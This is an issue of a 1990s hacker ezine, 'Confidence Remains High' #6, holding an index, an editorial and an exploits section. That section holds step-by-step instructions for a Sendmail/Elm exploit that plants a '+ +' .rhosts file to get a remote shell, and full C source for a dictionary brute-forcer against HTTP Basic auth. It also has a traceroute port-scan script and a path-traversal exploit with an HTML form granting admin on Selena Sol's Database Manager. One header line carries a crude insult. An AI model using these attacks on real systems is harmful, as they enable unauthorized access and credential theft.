Copy Link
Add to Bookmark
Report
Confidence Remains High Issue 06
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.o. cZo .o. Team CodeZero Presents .o. cZo .o.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
CYBERJUNKIE IS A FAT LYING GREASY CUNT - Cold-Fire
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/IIIIIIIIII /IIIIIIIIII /III /III
\ III_____/ \ III___/III \ III \ III
\ III \ III \ III \ III \_III
\ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh
\ III \ III__/III \ III__/ III
\ III \ III \ III \ III \ III
\ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___
\_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\
\/__/ \/__/ \/__/
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Issue 6
12th December 1997
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Editor : so1o
Pimped falken's flea : tymat
The usual : om3n, zer0x, xFli, electro,
Spheroid and helix.
Not forgotten : loss, organik, d-storm (aka el8)
peenut, pzn, suid and manly.
Special thanks to : Shok, dlc, efpee, chameleon, daxx
falken, figster and cain.
Windows : The carparts crew.
Kick in the teeth to : TRON and stealth (aka. dev_null)
.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We wrote this is 9 days in total, which is reasonably impressive
considering the content, we hope you enjoy it, because we won't
be putting out much until 1998 :) -- so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This Bumper Sized Christmas Issue :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
------=> Section A : Introduction And Cover Story.
1. Confidence Remains High issue 6....................: Tetsu Khan
2. Policy.............................................: so1o
------=> Section B : Exploits And Code.
1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT....: figster
2. TraceProbe.sh......................................: falken
3. BruteWeb (SSL) 2.0.................................: BeastMaster V
4. Check.sh...........................................: xFli
5. Selena Sol remote flaw (unpublished)...............: Cain
------=> Section C : Phones / Scanning / Radio.
1. ShokDial...........................................: Shok
2. More MIT dialups...................................: zer0x
3. Hiding within the system...........................: efpee
4. An introduction to LightSpan 2000's................: dlc
5. An introduction to the NEC P3......................: DaXX
6. More Russian dialups...............................: Lirik
7. UK x.25 network numbers............................: Cold-Fire
------=> Section D : Miscellaneous.
1. A short introduction to IPv6.......................: so1o
2. Newbie sk00l.......................................: so1o
3. Windows NT filesharing basics......................: chameleon
4. BitchX / crackrock bug.............................: so1o / Shok
5. Nifty Lynx trick...................................: Electric Nectar
6. No-more negative...................................: so1o
------=> Section E : World News.
1. Pentagon hacked....................................: so1o
-------=> Section F : Projects.
1. TOTALCON '98.......................................: so1o
------=> Section G : FIN.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High issue 6 : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Welcome to a vastly new and improved Confidence Remains High, now geared to
(basically) everyone we could think of, there may be some parts that some of
you may dislike and think below you, as well as being some parts you actually
learn something from, as always, we hope you enjoy this issue, and those
to come in the future..
The distro list..
=================
www.technotronic.com /ezines/crh/
cybrids.simplenet.com /Toast/files/CRH/
ftp.linuxwarez.com /pub/crh/
ftp.sekurity.org /users/so1o/
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Policy : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In issues 1, 2 and 3, we took our readers through some simple steps of getting
some exploits, using them, and reaping the rewards, some, if not most of those
exploits that we published were taken from recent posts to BugTraq
(at http://www.geek-girl.com/bugtraq) and from websites such as the acclaimed
www.rootshell.com, then CRH was aimed soley at those who had read 1980's BBS
text files until they were blue in the face and couldn't stand another
"UNIX for beginners" file, so we put out this magazine, in an attempt to take
the "newbies" who wanted to learn, and give them an oppurtunity to gain up-to
date knowledge about the scene and the way things work now, because those who
write other magazines really don't gear their articles to those who aren't
fully confident with Unix and the ideas and methodologies that are needed to
understand exactly whats going on.
Since then our readership levels have increased, and more and more of the
people who are highly skilled (halflife for one) have made statements about
Confidence Remains High being weak and lame, but thats only an opinion, but
none the less, we have taken it into account, and tried our best to make this,
and issues to come, geared to both newbies and the elite few who care to
critisize us..
We don't want to be like Phrack, they get alot of flames themselves, the only
reason we write these files is to learn, keep ourselves out of trouble, teach
others, and most importantly, to have fun (and become famous, heh j/k)..
If you want something a little more simple to understand, then read CRH,
if you want something that is only understandable by those who wrote the
articles and the few who actually know about the subjects covered, then
read Phrack. If you don't understand either Phrack or CRH, then read THTJ
which is a weak version of CRH, with vB programs, articles that were
previously in CRH, and not forgetting, members of sIn as writers,
hahahahoeowehahahahaha!
Thank you for listening,
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT : figster
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
On a variety of machines running Sendmail, Elm 2.4 will also be used, the hole
regards the sun-message.csh which is called by Elm, this in turn will call
uudecode which will create a file on the filesystem complete with the
file permissions you previously set, then fail gracefully and not inform you
that the file had been created, h0h0h0.
If you use the 64-bit mime encoding, you can even save the file, look at it,
and not see the evil hax0r file that was specified.
So far linux and anything running the metamail decoder sun-message.csh are
vulnerable..
This is basically what you do... It may not work, don't blame us :
------------------------------------------------------------------
1) create your evil file (a .rhosts in this case)...
% echo "+ +" > /tmp/eatm3
2) next uuencode your "logic bomb"... making the file /tmp/eatme
% uuencode /tmp/eatm3 /bin/.rhosts > /tmp/eatme.uue
3) attach the /tmp/eatme.uue to the email to the target so the Content Type
is set to "default/text"
4) send your e-mail to the target, eg. bin@target.here.com
5) then attempt to use rsh..
% rsh -l bin target.here.com csh -i
If you don't get a shell from using rsh, then the in.rshd may not be running,
or the exploit may have failed (most probable cause)
This original technique was given to figster, then he wrote up a file, then I
made the file easier to understand, it's quite rare for this to actually work,
so don't think it will first time :-)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. TraceProbe.sh : falken
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#!/bin/sh
#
# falken@rune.org presents Traceprobe version 1.4
#
# basically uses strobe to portscan all the hosts from
# a traceroute query, saves me alot of time, thats what it's for..
#
# requires stobe in the same directory as well as
# access to awk and most importantly traceroute.
#
/usr/sbin/traceroute $1 > $1.traceroute
/bin/cat $1.traceroute | awk '{print $2}' > $1.traceroute.host
strobe -i $1.traceroute.host -b $2 -e $3
# cleanup here..
/bin/rm $1.traceroute $1.traceroute.host
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. BruteWeb (SSL) 2.0 : BeastMaster V
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
*
* Brute Web (SSL) 2.0, BeastMaster V.
* September 1997, for Confidence Remains High magazine.
*
* You will probably need to download the SSL libraries from
* ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/
*
* To compile (one line) :
*
* cc -o brute_ssl -I/usr/local/ssl/include brute_ssl.c \
* -L/usr/local/ssl/lib -lssl -lcrypto
*
* brute_ssl to run, gives usage..
*
* Disclaimer : I am not responsible for anything you do with this
* tool, so please use it in a responsible manner.
*
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <rsa.h>
#include <crypto.h>
#include <x509.h>
#include <pem.h>
#include <ssl.h>
#include <err.h>
extern int errno, h_errno;
#define SPACELEFT(buf,ptr) (sizeof buf-((ptr)-buf))
#define newstr(s) strcpy(malloc(strlen(s)+1),s)
#define HTTPD_UNAUTHORIZED 401
#define FL __FILE__,__LINE__
#define MAXDICTWORD 64
#define MAXNAMEPASSLEN 128
#define MAXENCODEDSTRING 256
#define MAXSENDSTRING 300
#define HAS_DICTIONARY 0x0001
#define HAS_USERNAME 0x0002
#define HAS_PORTNUMBER 0x0004
#define HAS_HOSTNAME 0x0008
#define HAS_VERBOSE 0x0010
#define HAS_SSL_OPT 0x0020
#define HAS_REALM 0x0040
#define HAS_DONE_IT 0x0080
#if SSLEAY_VERSION_NUMBER >= 0x0800
#define SSLEAY8
#endif
char alphabet[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char *prg_nme;
int mask;
struct BASE64_PARAMS
{
unsigned long int accum;
int shift;
int save_shift;
};
/* BeastMaster V's error logging function */
void proc_err(char *func,char *file,int line,const char *fmt, ...)
{
va_list args;
if (prg_nme!=NULL)
fprintf(stderr,"[%s]", prg_nme);
va_start(args, fmt);
fprintf(stderr," %s() ",func);
fprintf(stderr,"<file:%s line:%d> : ",file,line);
vfprintf(stderr, fmt, args);
fputc('\n', stderr);
fflush(stderr);
va_end(args);
}
/* an implementation of signal() based on sigaction() */
void (*r_signal(int sig,void(*func)())) (int)
{
struct sigaction act, oact;
act.sa_handler = func;
sigemptyset(&act.sa_mask);
act.sa_flags = 0;
#ifdef SA_RESTART
act.sa_flags |= SA_RESTART;
#endif
if (sigaction(sig, &act, &oact) < 0)
return (SIG_ERR);
return (oact.sa_handler);
}
/* function to read into a buffer over and SSL connection */
int SSL_readln(SSL *ssl_con, char *buf, int buf_size)
{
int i=0,done=0,w;
char tmp[1];
*(buf+0)='\0';
while (!done)
{
if (i==(buf_size-1))
break;
w=SSL_read(ssl_con,tmp,1);
if (w<0)
return -1;
if (w==0) return 0;
if (tmp[0]!=0)
*(buf+i)=tmp[0];
if (*(buf+i)=='\n')
done=1;
i++;
}
*(buf+i)='\0';
return(i);
}
/* read from socket into a buffer until sizeof(buffer) or newline */
int socket_readln(int s,char *buf,short len)
{
int i=0, w;
char tmp[1];
short done=0;
while (!done) {
if (i==len)
break;
w=read(s ,tmp, 1);
if (w==0) return 0;
if (tmp[0] != 0) {
*(buf+i) = tmp[0];
}
if (tmp[0]=='\n') {
done = 1;
}
i++;
}
*(buf+i)='\0';
return (i);
}
/* base64 encode an arbitrary string */
int base64_encode(int quit,struct BASE64_PARAMS *e_p,char *string_to_encode,char *buf_64)
{
int index;
unsigned long int value;
unsigned char blivit;
int z=0;
index = 0;
while((*(string_to_encode+z))||(e_p->shift!=0))
{
if ((*(string_to_encode+z))&&(quit==0))
{
blivit = *(string_to_encode +z);
z++;
if (*(string_to_encode+z)==0)
{
quit = 1;
e_p->save_shift=e_p->shift;
blivit=0;
}
}
else
{
quit=1;
e_p->save_shift=e_p->shift;
blivit=0;
}
if ((quit==0)||(e_p->shift!= 0))
{
value=(unsigned long)blivit;
e_p->accum <<= 8;
e_p->shift += 8;
e_p->accum |= value;
}
while (e_p->shift >= 6)
{
e_p->shift -= 6;
value = (e_p->accum >> e_p->shift) & 0x3Fl;
blivit = alphabet[value];
*(buf_64+(index++)) = blivit;
if (index >= 60)
{
*(buf_64+index)='\0';
index = 0;
}
if ( quit != 0 )
e_p->shift = 0;
}
}
if (e_p->save_shift==2)
{
*(buf_64+(index++))='=';
if (index>=60)
{
*(buf_64+index)='\0';
index=0;
}
*(buf_64+(index++))='=';
if (index>=60 )
{
*(buf_64+index)='\0';
index=0;
}
}
else if (e_p->save_shift==4)
{
*(buf_64+(index++))='=';
if (index>=60)
{
*(buf_64+index)='\0';
index=0;
}
}
if (index!=0)
*(buf_64+index)='\0';
return quit;
}
/* takes string to encode and a user supplied buffer as parameters */
void encode_string (char *name_pass,char *buf_64)
{
struct BASE64_PARAMS e_p;
int quit=0;
register int i;
char s[MAXNAMEPASSLEN+3];
e_p.shift = 0;
e_p.accum = 0;
sprintf(s,"%s%c",name_pass,*(name_pass+strlen(name_pass)-1));
base64_encode(quit, &e_p, s,buf_64);
return;
}
/* check the web server's HTTP response headers */
short check_response (char *response)
{
short ScanCount;
int httpd_code;
short version;
ScanCount=sscanf(response,"HTTP/1.%d %d",&version,&httpd_code);
if (ScanCount!=2)
return 0;
if (httpd_code==HTTPD_UNAUTHORIZED)
return 0;
else
return 1;
}
/* reads a line from a file */
short read_line(FILE *fp, char *buf)
{
int c;
short done=0;
short i=0;
while (!done)
{
c=fgetc(fp);
if (c==EOF)
return 0;
if (c=='\n')
{
done=1;
break;
}
if (c)
*(buf+i)=c;
i++;
}
*(buf+i)='\0';
return i;
}
void terminate (int sig)
{
proc_err("terminate",FL,"[%s] has caught %d (%s)",
prg_nme,sig,(sig==SIGINT)?"SIGINT":"SIGSEGV");
exit(EXIT_FAILURE);
}
/* creates a TCP socket and connects it to a peer */
int make_socket(char *in_host,unsigned short port_num)
{
int sd, err;
struct hostent *hp=NULL;
struct sockaddr_in sa;
sd=socket(AF_INET, SOCK_STREAM, 0);
if (sd==-1)
{
proc_err("make_socket",FL,"Could not create socket->%s",strerror(errno));
exit(EXIT_FAILURE);
}
hp=gethostbyname(in_host);
if (!hp)
{
if (h_errno==HOST_NOT_FOUND)
proc_err("make_socket",FL,"Could not resolv [%s]->Host not Found",in_host);
else
proc_err("make_socket",FL,"Cound not resolv [%s]->DNS error",in_host);
exit(EXIT_FAILURE);
}
bzero(&sa,sizeof(sa));
sa.sin_family=hp->h_addrtype;
bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length);
sa.sin_port=htons(port_num);
err=connect(sd, (struct sockaddr *)&sa,sizeof(sa));
if (err==-1)
{
proc_err("make_socket",FL,"connect() call failed->%s",strerror(errno));
exit(EXIT_FAILURE);
}
return sd;
}
/* prints the program usage */
void print_usage()
{
int x;
char messages[][255] =
{
"\n\t'%s [options]'\n\n",
"Options:\n",
"\t-v <optional> verbose mode (print responses to stdout)\n",
"\t-z <optional> SSL flag (use this for secure servers)\n",
"\t-d dictionary file (full path to dictionary file)\n",
"\t-u username (a user on the target webserver)\n",
"\t-h hostname (host running the webserver)\n",
"\t-p portnumber (port that the webserver runs on)\n",
"\t-r realm (the full path to the protected realm)\n\n",
"Example:\n",
"\tSay everytime I type https://www.somewhere.com/protected\n",
"\tinto netscape, a box pops up and asks me to enter in a\n",
"\tUser ID and password. Well, I have no idea what User ID\n",
"\tor password to enter in, so I'll try to 'guess' my way in.\n",
"\tI have a dictionary file in /tmp/dict.txt. Next I'll guess\n",
"\ta username of \"foo\". Now I can type a command like:\n",
"\n",
" %s -z -d /tmp/dict.txt -u foo -h www.somewhere.com -p 443 -r /protected\n",
"\n",
"\tNow with any luck I'll eventually see a username and password.\n",
"\ti.e: ----USERNAME=foo PASSWORD=foopass----\n\n",
"\0"
};
fprintf(stderr,"\n-- Brute Web (SSL) v2.0 --\n");
for(x=0; *messages[x]!='\0';x++)
fprintf(stderr, messages[x], prg_nme);
}
/* brute_ssl */
int main (unsigned int argc,char **argv, char **envp)
{
int err=0, sd,in_port=0, try=0;
char c, *export_buf=NULL;
SSL *ssl_con=NULL;
SSL_CTX *ssl_ctx=NULL;
unsigned long ssl_err;
FILE *dict_fd=NULL;
char *dict_name=NULL,*in_host=NULL;
char *user=NULL,*realm=NULL, *dict_word=NULL;
char *name_pass_buf=NULL, *encoded_buf=NULL;
char *p_title=NULL;
if ((prg_nme=strrchr(argv[0],'/')))
++prg_nme;
else
prg_nme=argv[0];
mask=0;
while((c=getopt(argc,argv,"vzd:u:h:p:r:"))!=EOF)
{
switch(c)
{
case 'v':
mask|=HAS_VERBOSE;
break;
case 'z':
mask|=HAS_SSL_OPT;
break;
case 'd':
dict_name=optarg;
mask|=HAS_DICTIONARY;
break;
case 'u':
user=optarg;
mask|=HAS_USERNAME;
break;
case 'h':
in_host=optarg;
mask|=HAS_HOSTNAME;
break;
case 'p':
in_port=atoi(optarg);
if (!in_port)
err++;
mask|=HAS_PORTNUMBER;
break;
case 'r':
realm=optarg;
mask|=HAS_REALM;
break;
case '?':
err++;
}
}
if ((optind<argc)||err)
{
print_usage();
exit(EXIT_FAILURE);
}
if ((!(mask&HAS_HOSTNAME))||(!(mask&HAS_PORTNUMBER))||
(!(mask&HAS_USERNAME))||(!(mask&HAS_DICTIONARY))||(!(mask&HAS_REALM)))
{
print_usage();
exit(EXIT_FAILURE);
}
r_signal(SIGPIPE,SIG_IGN);
r_signal(SIGINT,terminate);
r_signal(SIGSEGV,terminate);
dict_word=(char *)malloc(MAXDICTWORD);
if (!dict_word)
{
proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno));
exit(EXIT_FAILURE);
}
name_pass_buf=(char *)malloc(MAXNAMEPASSLEN);
if (!name_pass_buf)
{
proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno));
exit(EXIT_FAILURE);
}
encoded_buf=(char *)malloc(MAXENCODEDSTRING);
if (!encoded_buf)
{
proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno));
exit(EXIT_FAILURE);
}
export_buf=(char *)malloc(MAXSENDSTRING);
if (!export_buf)
{
proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno));
exit(EXIT_FAILURE);
}
dict_fd=fopen(dict_name,"r");
if (dict_fd==NULL)
{
proc_err("main",FL,"Could not open dictionary file->%s",strerror(errno));
exit(EXIT_FAILURE);
}
if (mask & HAS_SSL_OPT)
{
SSLeay_add_ssl_algorithms();
SSL_load_error_strings();
ssl_ctx = SSL_CTX_new(SSLv2_client_method());
if (!ssl_ctx)
{
proc_err("main",FL,"Call to SSL_CTX_new return a NULL");
exit(EXIT_FAILURE);
}
}
while (read_line(dict_fd,dict_word))
{
sd=make_socket(in_host,in_port);
if (mask & HAS_SSL_OPT)
{
ssl_con=SSL_new(ssl_ctx);
if (!ssl_con)
{
proc_err("main",FL,"SSL_new() returned NULL.");
exit(EXIT_FAILURE);
}
SSL_set_fd (ssl_con, sd);
ssl_err=SSL_connect(ssl_con);
if (ssl_err<=0)
{
ssl_err=ERR_get_error();
proc_err("main",FL,"SSL_connect() failed->%s\n", ERR_error_string(ssl_err,export_buf));
exit(EXIT_FAILURE);
}
}
sprintf(name_pass_buf,"%s:%s",user,dict_word);
encode_string(name_pass_buf,encoded_buf);
sprintf(export_buf,"GET %s HTTP/1.0\nAuthorization: Basic %s\n\n",realm, encoded_buf);
try++;
if (mask & HAS_SSL_OPT)
{
SSL_write(ssl_con,export_buf,strlen(export_buf));
SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1);
if (mask & HAS_VERBOSE)
fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf);
}
else
{
write(sd,export_buf,strlen(export_buf));
socket_readln(sd,export_buf,MAXSENDSTRING-1);
if (mask & HAS_VERBOSE)
fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf);
}
if (check_response(export_buf))
{
mask |=HAS_DONE_IT;
break;
}
if (mask & HAS_VERBOSE)
{
if (mask & HAS_SSL_OPT)
{
while(SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1))
fprintf(stdout,"%s",export_buf);
}
else
{
while(socket_readln(sd,export_buf,MAXSENDSTRING-1))
fprintf(stdout,"%s",export_buf);
}
}
close(sd);
if (mask & HAS_SSL_OPT)
SSL_free(ssl_con);
}
if (mask & HAS_DONE_IT)
fprintf(stdout,"\n\n\t----USERNAME=%s PASSWORD=%s----\n\n",user,dict_word);
else
fprintf(stdout,"\n\n\t----Sorry, but I could not get in.----\n");
free(dict_word);
free(name_pass_buf);
free(export_buf);
if (mask & HAS_SSL_OPT)
SSL_CTX_free(ssl_ctx);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Check.sh : xFli
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#!/bin/bash
#
#
# - Simple Crontab monitor for keeping tabs on index.html
#
# - At the moment, if the script finds a change in the filesize of the file
# it will copy the bad file to /var/log/.evil and replace it with the
# backup, log its actions to /var/log/check.log and inform [mail] of the error.
# If the backup itself has the wrong filesize, it will shutdown the
# inetd superserver and notify [mail] of the mismatch. You should edit
# this to run commands more suitable to your situation. (line 58)
#
#
# - Usage check.sh [original] [backup] [filesize] [mail]
#
#
# - [original] is the FULL PATH to the file you want to guard e.g. /home/http/index.html
# - [backup] is the FULL PATH to the backup of the original e.g. /root/backup.html
# - [filesize] is the size in bytes of the original, e.g. 39790
# - [mail] is a mail address that the script should send notifications to, e.g. root@localhost
#
# - If you want to run the check every 5 minutes, add the following line
# - to root's crontab:
# 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /root/check.sh /home/http/index.html /root/backup.html 37970 root@localhost
#
# (remembering to change the paths and the filesize)
#
#
# --=[ Cheap and nasty code from xFli, your number 1 discount store ]=--
#
# ONCE AGAIN: TAKE THE TIME TO EDIT THIS TO SUIT YOUR NEEDS BETTER
# You might want to take out the line that returns the
# status of the file even if it is 'OK' , especially
# if you are going to run the script a lot like every
# 30 seconds... :]
#
#
TIME=`/bin/uname -v`
if [ $1x = x ]; then
echo "Please read the usuage instructions for this script"
else
if ls -la $1 | grep $3 1>/dev/null 2>/dev/null ; then
echo "$1 OK "$TIME>>/var/log/check.log
echo "">>/vat/log/check.log
else
echo "">>/var/log/check.log
echo " - WARNING - file size mismatch on $1 at "$TIME>>/var/log/check.log
echo "WARNING : FILESIZE MISMATCH on $1"$TIME | mail $4
mv $1 /var/log/.evil
if ls -la $2 | grep $3 1>/dev/null 2>/dev/null ; then
cp $2 $1
else
echo ""/var/log/check.log
echo " - WARNING - Filesize mismatch on BACKUP FILE $2 at "$TIME>>/var/log/check.log
echo " - WARNING - Filesize mismatch on $2 at "$TIME | mail $4
echo "Shutting down inetd superserver "$TIME>>/var/log/check.log
killall -9 inetd
echo "">>/var/log/check.log
fi
fi
fi
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Selena Sol remote flaw : Cain
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
After many hours of sifting through the source code as part of my job at
an ISP, I stumbled onto something. A problem in the midst of the
authentication libraries of Selena Sol's Database Manager.
In auth-lib.pl at line 192 it reads
open (SESSIONFILE, "$auth_session_dir/$session_file")
Now this is interesting. Nowhere does it check to make shure you don't
have any '/' chars in the $session_file. So we can specify our own session
file outside the intended path :)
The session file format is:
id|group|fname|lname|email
always have the group be "admin". This way you get access to the entire
database. Let's say this remote system is some wierd warez archive. They
want us to upload files. So we make a file called werd.dat:
cain|admin|Cain|Bomb|cain@tasam.com
Then we FTP this file up to the remote system. Depending on what OS they
have, it will either be in /var/ftp/incoming or /home/ftp/incoming or
whatever, you figure it out. Now we make our HTML exploit!!! Just create
this file and view it using lynx, netscape, or whatever.
<form method="POST"
action="http://www.site.com/cgi-bin/db_manager.cgi?setup_file=database.cfg">
<input type="hidden" name=auth_user_name value="cain">
<input type="hidden" name=auth_password value="yomomma">
<input type="hidden" name=session_file value="../../var/ftp/incoming/werd">
<input type="submit" value="Click here to hack">
</form>
All the paths you'll hafta figure out on yer own. Notice theres no ".dat"
